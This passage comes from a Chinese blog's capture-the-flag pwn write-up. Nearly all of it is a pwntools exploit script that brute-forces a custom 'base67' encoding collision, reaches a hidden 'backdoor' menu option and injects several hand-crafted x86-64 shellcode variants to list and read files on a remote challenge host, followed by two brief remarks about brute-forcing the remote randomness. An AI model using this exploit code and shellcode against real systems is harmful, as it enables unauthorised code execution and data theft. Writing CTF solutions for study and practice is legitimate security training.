</span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>binary <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;./pwn&#34;</span>
</span></span><span style="display:flex;"><span>elf <span style="color:#f92672">=</span> ELF(proc, checksec<span style="color:#f92672">=</span><span style="color:#66d9ef">False</span>)
</span></span><span style="display:flex;"><span>libc <span style="color:#f92672">=</span> ELF(<span style="color:#e6db74">&#34;./mylibc/libc.so.6&#34;</span>, checksec<span style="color:#f92672">=</span><span style="color:#66d9ef">False</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>mylibc <span style="color:#f92672">=</span> cdll<span style="color:#f92672">.</span>LoadLibrary(<span style="color:#e6db74">&#34;/lib/libc.so.6&#34;</span>)
</span></span><span style="display:flex;"><span>seed <span style="color:#f92672">=</span> mylibc<span style="color:#f92672">.</span>time(<span style="color:#ae81ff">0</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">choose</span>(choice):
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34; &gt; &#34;</span>)
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendline(str(choice)<span style="color:#f92672">.</span>encode())
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">add</span>(idx, name, data):
</span></span><span style="display:flex;"><span>    choose(<span style="color:#ae81ff">1</span>)
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;Idx &gt; &#34;</span>, str(idx)<span style="color:#f92672">.</span>encode())
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;name &gt; &#34;</span>)
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendline(name)
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># io.sendlineafter(b&#34;name &gt; &#34;, name)</span>
</span></span><span style="display:flex;"><span>    res <span style="color:#f92672">=</span> io<span style="color:#f92672">.</span>recv(timeout<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># print(res)</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># io.sendlineafter(b&#34;Message &gt; &#34;, data)</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;Message &gt; &#34;</span> <span style="color:#f92672">in</span> res:
</span></span><span style="display:flex;"><span>        io<span style="color:#f92672">.</span>sendline(data)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">else</span>:
</span></span><span style="display:flex;"><span>        log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74"> is bad!&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">edit</span>(name, data):
</span></span><span style="display:flex;"><span>    choose(<span style="color:#ae81ff">4</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># io.sendlineafter(b&#34;Idx &gt; &#34;, str(idx).encode())</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># io.sendline(name)</span>
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;message &gt; &#34;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;WHAT CAN I SAY?!!!&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">backdoor</span>(idx, filename, shellcode):
</span></span><span style="display:flex;"><span>    choose(<span style="color:#ae81ff">666</span>)
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;Idx &gt; &#34;</span>, str(idx)<span style="color:#f92672">.</span>encode())
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;first &gt;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendline(filename)
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;shellcode &gt;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>, shellcode)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">base67_decode</span>(encoded_str):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> len(encoded_str) <span style="color:#f92672">%</span> <span style="color:#ae81ff">4</span> <span style="color:#f92672">!=</span> <span style="color:#ae81ff">0</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">raise</span> <span style="color:#a6e22e">ValueError</span>(<span style="color:#e6db74">&#34;Base67 编码长度必须是 4 的倍数&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    decoded_bytes <span style="color:#f92672">=</span> bytearray()  <span style="color:#75715e"># 用于存储解码后的字节数据</span>
</span></span><span style="display:flex;"><span>    bits <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>  <span style="color:#75715e"># 用于拼接解码后的 6 位块</span>
</span></span><span style="display:flex;"><span>    bit_count <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>  <span style="color:#75715e"># 用于追踪当前拼接的位数</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># 遍历编码字符串中的每个字符</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> char <span style="color:#f92672">in</span> encoded_str:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> char <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> char_to_value:
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">raise</span> <span style="color:#a6e22e">ValueError</span>(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;非法字符 </span><span style="color:#e6db74">{</span>char<span style="color:#e6db74">}</span><span style="color:#e6db74">，无法解码&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># 获取字符对应的值</span>
</span></span><span style="display:flex;"><span>        value <span style="color:#f92672">=</span> char_to_value[char]
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># 将该值转换为 6 位的二进制</span>
</span></span><span style="display:flex;"><span>        bits <span style="color:#f92672">=</span> (bits <span style="color:#f92672">&lt;&lt;</span> <span style="color:#ae81ff">6</span>) <span style="color:#f92672">|</span> value
</span></span><span style="display:flex;"><span>        bit_count <span style="color:#f92672">+=</span> <span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># 每满 8 位（即一个字节），将它提取出来并保存</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">while</span> bit_count <span style="color:#f92672">&gt;=</span> <span style="color:#ae81ff">8</span>:
</span></span><span style="display:flex;"><span>            bit_count <span style="color:#f92672">-=</span> <span style="color:#ae81ff">8</span>
</span></span><span style="display:flex;"><span>            decoded_byte <span style="color:#f92672">=</span> (bits <span style="color:#f92672">&gt;&gt;</span> bit_count) <span style="color:#f92672">&amp;</span> <span style="color:#ae81ff">0xFF</span>  <span style="color:#75715e"># 获取当前字节</span>
</span></span><span style="display:flex;"><span>            decoded_bytes<span style="color:#f92672">.</span>append(decoded_byte)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> bytes(decoded_bytes)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">find_data</span>():
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># magic_cnt = 100</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># cnt = 0</span>
</span></span><span style="display:flex;"><span>    ans <span style="color:#f92672">=</span> dict()
</span></span><span style="display:flex;"><span>    base67_chars <span style="color:#f92672">=</span> table
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># print(base67_chars)</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> char1 <span style="color:#f92672">in</span> base67_chars:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">for</span> char2 <span style="color:#f92672">in</span> base67_chars:
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">for</span> char3 <span style="color:#f92672">in</span> base67_chars:
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">for</span> char4 <span style="color:#f92672">in</span> base67_chars:
</span></span><span style="display:flex;"><span>                    encoded_str <span style="color:#f92672">=</span> char1 <span style="color:#f92672">+</span> char2 <span style="color:#f92672">+</span> char3 <span style="color:#f92672">+</span> char4
</span></span><span style="display:flex;"><span>                    <span style="color:#66d9ef">try</span>:
</span></span><span style="display:flex;"><span>                        decoded_data <span style="color:#f92672">=</span> base67_decode(encoded_str)
</span></span><span style="display:flex;"><span>                        <span style="color:#66d9ef">if</span> (<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x00</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">in</span> decoded_data):
</span></span><span style="display:flex;"><span>                            <span style="color:#66d9ef">continue</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#75715e"># print(1)</span>
</span></span><span style="display:flex;"><span>                        decoded_string <span style="color:#f92672">=</span> decoded_data<span style="color:#f92672">.</span>decode(<span style="color:#e6db74">&#39;utf-8&#39;</span>, errors<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;strict&#39;</span>)
</span></span><span style="display:flex;"><span>                        <span style="color:#66d9ef">if</span> decoded_data <span style="color:#f92672">in</span> decoded_data_set:
</span></span><span style="display:flex;"><span>                            <span style="color:#66d9ef">if</span> decoded_data <span style="color:#f92672">==</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;</span><span style="color:#ae81ff">\t\x10</span><span style="color:#e6db74">1&#39;</span>:
</span></span><span style="display:flex;"><span>                                <span style="color:#66d9ef">return</span> (decoded_data, encoded_str, ans[decoded_data])
</span></span><span style="display:flex;"><span>                        <span style="color:#66d9ef">else</span>:
</span></span><span style="display:flex;"><span>                            decoded_data_set<span style="color:#f92672">.</span>add(decoded_data)
</span></span><span style="display:flex;"><span>                            ans[decoded_data] <span style="color:#f92672">=</span> encoded_str
</span></span><span style="display:flex;"><span>                    <span style="color:#66d9ef">except</span> <span style="color:#a6e22e">ValueError</span> <span style="color:#66d9ef">as</span> E:
</span></span><span style="display:flex;"><span>                        <span style="color:#66d9ef">pass</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">pwn</span>(username, password):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> argv[<span style="color:#ae81ff">1</span>] <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;r&#34;</span>:
</span></span><span style="display:flex;"><span>        io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;username: &#34;</span>, username)
</span></span><span style="display:flex;"><span>        io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;password: &#34;</span>, password)
</span></span><span style="display:flex;"><span>    data, msg1, msg2 <span style="color:#f92672">=</span> find_data()
</span></span><span style="display:flex;"><span>    log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;data =&gt; </span><span style="color:#e6db74">{</span>data<span style="color:#e6db74">}</span><span style="color:#e6db74">; msg1 =&gt; </span><span style="color:#e6db74">{</span>msg1<span style="color:#e6db74">}</span><span style="color:#e6db74">; msg2 =&gt; </span><span style="color:#e6db74">{</span>msg2<span style="color:#e6db74">}</span><span style="color:#e6db74">;&#34;</span>)
</span></span><span style="display:flex;"><span>    res1 <span style="color:#f92672">=</span> add(<span style="color:#ae81ff">0</span>, msg1<span style="color:#f92672">.</span>encode(), <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;b&#34;</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> res1 <span style="color:#f92672">==</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    res2 <span style="color:#f92672">=</span> add(<span style="color:#ae81ff">1</span>, msg2<span style="color:#f92672">.</span>encode(), <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;b&#34;</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> res2 <span style="color:#f92672">==</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    choose(<span style="color:#ae81ff">4</span>)
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;name &gt; &#34;</span>, msg2<span style="color:#f92672">.</span>encode())
</span></span><span style="display:flex;"><span>    res <span style="color:#f92672">=</span> io<span style="color:#f92672">.</span>recv(timeout<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span>)
</span></span><span style="display:flex;"><span>    print(res)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;No&#34;</span> <span style="color:#f92672">in</span> res:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">elif</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;GOOD&#34;</span> <span style="color:#f92672">in</span> res:
</span></span><span style="display:flex;"><span>        io<span style="color:#f92672">.</span>sendline(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;WHAT CAN I SAY?!!!&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># edit(msg2.encode(), b&#34;WHAT CAN I SAY?!!!&#34;)</span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># print(payload)</span>
</span></span><span style="display:flex;"><span>        ans <span style="color:#f92672">=</span> input()
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> ans <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;1&#34;</span>:
</span></span><span style="display:flex;"><span>            backdoor(<span style="color:#ae81ff">0</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;.&#34;</span>, asm(shellcode1))
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">elif</span> ans <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;2&#34;</span>:
</span></span><span style="display:flex;"><span>            backdoor(<span style="color:#ae81ff">0</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;.&#34;</span>, asm(shellcode2))
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">elif</span> ans <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;3&#34;</span>:
</span></span><span style="display:flex;"><span>            backdoor(<span style="color:#ae81ff">0</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;1</span><span style="color:#ae81ff">\xc3\x1a</span><span style="color:#e6db74">&#34;</span>, asm(shellcode3))
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">elif</span> ans <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;4&#34;</span>:
</span></span><span style="display:flex;"><span>            backdoor(<span style="color:#ae81ff">0</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;.&#34;</span>, asm(shellcode4))
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># backdoor(0, b&#34;lag_b04c54574d1&#34;, payload)</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># shellcode1 is ls</span>
</span></span><span style="display:flex;"><span>shellcode1 <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;&#34;xchg rcx, fs:[rbx]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xor edi, 6
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xor edi, 5
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">dec dx
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xchg rsi, rcx
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xor al, 0xeb
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xor al, 0x32
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">syscall
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xchg eax, esp
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xor eax, 0x1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">dec edi
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">syscall
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;&#34;&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># ls + rename</span>
</span></span><span style="display:flex;"><span>shellcode2 <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xchg rsp, fs:[rbx]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">add rsi, rsp
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">mov dl, 0xff
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">push 3
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">pop rdi
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">mov al, 78
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">syscall
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">push 122
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">pop rdi
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">add rdi, rsp
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">mov al, 82
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">syscall
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;&#34;&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># read + write</span>
</span></span><span style="display:flex;"><span>shellcode3 <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;&#34;xchg rcx, fs:[rbx]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xor edi, 6
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xor edi, 5
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xor edx, 0x50
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xchg rsi, rcx
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">syscall
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xchg eax, esp
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xor eax, 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">dec edi
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">syscall
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;&#34;&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># ls + write</span>
</span></span><span style="display:flex;"><span>shellcode4 <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xchg rsp, fs:[rbx]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">add rsi, rsp
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">mov dl, 0xff
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">push 3
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">pop rdi
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">mov al, 78
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">syscall
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">add rsp, 122
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">mov al, 0x1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">push 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">pop rdi
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">mov rsi, rsp
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">syscall
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;&#34;&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># payload = asm(shellcode1)</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>s <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;A+uP/07xRabdy2jzvr&gt;XLKD9sZ6O5HpctlVkShMCUfiNw3oG?eBTIJmqEQWg&lt;Y4Fn18&#34;</span>
</span></span><span style="display:flex;"><span>table <span style="color:#f92672">=</span> s
</span></span><span style="display:flex;"><span>cnt <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">while</span> <span style="color:#66d9ef">True</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> cnt <span style="color:#f92672">==</span> <span style="color:#ae81ff">68</span>:
</span></span><span style="display:flex;"><span>        cnt <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>    table <span style="color:#f92672">=</span> s[cnt:] <span style="color:#f92672">+</span> s[:cnt]
</span></span><span style="display:flex;"><span>    cnt <span style="color:#f92672">=</span> cnt <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    char_to_value <span style="color:#f92672">=</span> {char: idx <span style="color:#66d9ef">for</span> idx, char <span style="color:#f92672">in</span> enumerate(table)}
</span></span><span style="display:flex;"><span>    decoded_data_set <span style="color:#f92672">=</span> set()
</span></span><span style="display:flex;"><span>    log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;cnt =&gt; </span><span style="color:#e6db74">{</span>cnt<span style="color:#e6db74">}</span><span style="color:#e6db74">; table =&gt; </span><span style="color:#e6db74">{</span>table<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># io = remote(&#34;tld1027.com&#34;, 8999)</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># io = process(proc)</span>
</span></span><span style="display:flex;"><span>    io <span style="color:#f92672">=</span> remote(<span style="color:#e6db74">&#34;tld1027.com&#34;</span>, <span style="color:#ae81ff">8999</span>) <span style="color:#66d9ef">if</span> argv[<span style="color:#ae81ff">1</span>] <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;r&#39;</span> <span style="color:#66d9ef">else</span> process(proc)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> args<span style="color:#f92672">.</span>G:
</span></span><span style="display:flex;"><span>        gdb<span style="color:#f92672">.</span>attach(io, <span style="color:#e6db74">&#34;b *$rebase(0x1b150)</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">b *$rebase(0x1b243)&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> pwn(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;xu&#34;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;1&#34;</span>) <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span>:
</span></span><span style="display:flex;"><span>        io<span style="color:#f92672">.</span>interactive()
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">break</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">else</span>:
</span></span><span style="display:flex;"><span>        io<span style="color:#f92672">.</span>close()
</span></span></code></pre></div><p>远程的随机数没法用时间预测了，所以我打了一个爆破。</p>
<p>t1d 说我可以给先知投稿，有 200 米，那我找时间把这个题 wp 正好写掉。</p>

        </div>

        <div class="row middle-xs">
          <div class="col-xs-12">
            
          </div>
        </div>
        
          <div class="row">
            <div class="col-xs-12">
              
            </div>
          </div>

          



          
          
          <div style="height: 50px;"></div>
          
        

        

<link rel="shortcut icon" href="favicon.ico" />



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.16.8/dist/katex.min.css">
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.16.8/dist/katex.min.js"></script>

<script defer src="https://cdn.jsdelivr.net/npm/katex@0.16.8/dist/contrib/auto-render.min.js" onload="renderMathInElement(document.body);"></script>

<script>
    document.addEventListener("DOMContentLoaded", function() {
        renderMathInElement(document.body, {
            delimiters: [
                {left: "$$", right: "$$", display: true},
                {left: "$", right: "$", display: false}
            ]
        });
    });
</script>




<link rel="stylesheet"
  href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/styles/atom-one-dark.min.css">
<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/languages/x86asm.min.js"></script>

<script>hljs.initHighlightingOnLoad();</script>

<script>
document.addEventListener('DOMContentLoaded', (event) => {
  document.querySelectorAll('pre code').forEach((el) => {
    hljs.highlightElement(el);
  });
});
</script>




      </div>
    </div>
  </article>

  

<script>
  
  
    
    
  
</script>

  

</body>

</html>